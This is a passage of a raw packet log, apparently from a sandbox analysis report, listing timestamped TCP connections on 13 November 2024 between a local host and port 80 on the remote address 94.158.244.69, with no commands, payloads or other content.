                                                        Nov 13, 2024 10:51:56.868161917 CET804983694.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:57.422661066 CET4988080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:57.427716017 CET804988094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:57.427927971 CET4988080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:57.428078890 CET4988080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:57.428469896 CET4988080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:51:57.433027983 CET804988094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:51:57.433443069 CET804988094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:05.903078079 CET804988094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:05.903143883 CET4988080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:05.903235912 CET4988080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:05.908052921 CET804988094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:06.408164978 CET4992980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:06.413351059 CET804992994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:06.414611101 CET4992980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:06.415471077 CET4992980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:06.415994883 CET4992980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:06.420453072 CET804992994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:06.420798063 CET804992994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:14.894579887 CET804992994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:14.894678116 CET4992980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:14.894906998 CET4992980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:14.899760008 CET804992994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:15.185980082 CET4997880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:15.191365957 CET804997894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:15.191611052 CET4997880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:15.191611052 CET4997880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:15.191987038 CET4997880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:15.196397066 CET804997894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:15.196733952 CET804997894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:23.675676107 CET804997894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:23.675838947 CET4997880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:23.675900936 CET4997880192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:23.680854082 CET804997894.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.181866884 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.186825991 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.187182903 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.187668085 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.187920094 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.192559958 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.192631006 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.192958117 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.192987919 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193008900 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.193037033 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193042040 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.193064928 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193082094 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.193136930 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193166018 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193216085 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193243980 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193274021 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.193310022 CET4997980192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:24.197510958 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.197905064 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.198297977 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.198324919 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.198415995 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.198442936 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:24.241470098 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:32.696775913 CET804997994.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:33.105895042 CET4998080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:33.110902071 CET804998094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:33.111006021 CET4998080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:33.111166000 CET4998080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:33.111530066 CET4998080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:33.115941048 CET804998094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:33.116287947 CET804998094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:41.586694002 CET804998094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:41.586762905 CET4998080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:41.586869955 CET4998080192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:41.591682911 CET804998094.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.322516918 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.327481985 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.327802896 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.327802896 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.328429937 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.332804918 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.332973957 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.333323002 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333336115 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333345890 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333375931 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333385944 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333395004 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333398104 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333410025 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.333445072 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333452940 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.333484888 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.333494902 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.333532095 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.337898016 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.338093042 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.338489056 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.338510990 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.338515043 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.338589907 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.338601112 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.338603020 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.339216948 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.381392002 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.381649017 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.429411888 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.429533005 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.481376886 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.481801033 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.529400110 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.529652119 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.577377081 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.577922106 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.629422903 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.629784107 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.681685925 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.681833982 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.733609915 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.734092951 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.781383991 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.781924009 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.829435110 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.829835892 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.881398916 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.881505013 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.929483891 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.930965900 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:42.977540016 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:42.977650881 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.025429964 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.026958942 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.073404074 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.073956013 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.121391058 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.122961998 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.173378944 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.173451900 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.221402884 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.222047091 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.269583941 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.269736052 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.319179058 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.319295883 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.371085882 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.371203899 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.417423010 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.417609930 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.465411901 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.465605021 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.513331890 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.513447046 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.561476946 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.561600924 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.609571934 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.609791994 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.661410093 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.661617994 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.709336996 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.709444046 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.757522106 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.757594109 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.805545092 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.805613995 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.853483915 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.853600025 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.901437998 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.901527882 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.949389935 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.949471951 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:43.997513056 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:43.997638941 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.045397997 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.045571089 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.097409964 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.097487926 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.149435043 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.149513006 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.197403908 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.197488070 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.245369911 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.245426893 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.297384977 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.297480106 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.345473051 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.345523119 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.394195080 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.394263983 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.441359997 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.441482067 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.497085094 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.497353077 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.545363903 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.545471907 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.593431950 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.593552113 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.641417027 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.641522884 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.689505100 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.689630985 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.741488934 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.741564989 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.789509058 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.789589882 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.837419033 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.837533951 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.885366917 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.885423899 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.933386087 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.933463097 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:44.981489897 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:44.981573105 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.029388905 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.029532909 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.077519894 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.077644110 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.129403114 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.129525900 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.177376986 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.177445889 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.225357056 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.225447893 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.273396015 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.273504972 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.321368933 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.321500063 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.373404980 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.373538971 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.425357103 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.425479889 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.473448992 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.473501921 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.521507978 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.521564007 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.569453955 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.569572926 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.617527008 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.617614031 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.669605017 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.669857979 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.721600056 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.721848965 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.773380041 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.773499966 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.821448088 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.821589947 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.873347044 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.873475075 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.921366930 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.921483994 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:45.973498106 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:45.973721027 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.021399975 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.021517992 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.069427967 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.069488049 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.117350101 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.117415905 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.165432930 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.165620089 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.213418007 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.213530064 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.261297941 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.261377096 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.309309006 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.309410095 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.357428074 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.357588053 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.405406952 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.405535936 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.453466892 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.453527927 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.501436949 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.501673937 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.549660921 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.549814939 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.597414970 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.597486019 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.645354986 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.645447969 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.693417072 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.693474054 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.741357088 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.741415024 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.789383888 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.789459944 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.837456942 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.837569952 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.885440111 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.885504961 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.933420897 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.933537006 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:46.981877089 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:46.981973886 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.029464006 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.029620886 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.077583075 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.077811003 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.125605106 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.125830889 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.173397064 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.173578024 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.221481085 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.223071098 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.273484945 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.273694992 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.321567059 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.321657896 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.373553038 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.373698950 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.425539017 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.425698996 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.473624945 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.473685980 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.521537066 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.521677971 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.573404074 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.573581934 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.625854969 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.625993013 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.677336931 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.677584887 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:47.729469061 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:47.731216908 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.005213976 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.007041931 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.012015104 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.014206886 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.061463118 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.063066006 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.109416962 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.109574080 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.161314964 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.161452055 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.209384918 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.209512949 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.261499882 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.261725903 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.309401989 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.309505939 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.357465982 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.357583046 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.409419060 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.409660101 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.457403898 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.457464933 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.505527020 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.505614042 CET4998280192.168.2.594.158.244.69
                                                        Nov 13, 2024 10:52:48.553423882 CET804998294.158.244.69192.168.2.5
                                                        Nov 13, 2024 10:52:48.553495884 CET4998280192.168.2.594.158.244.69
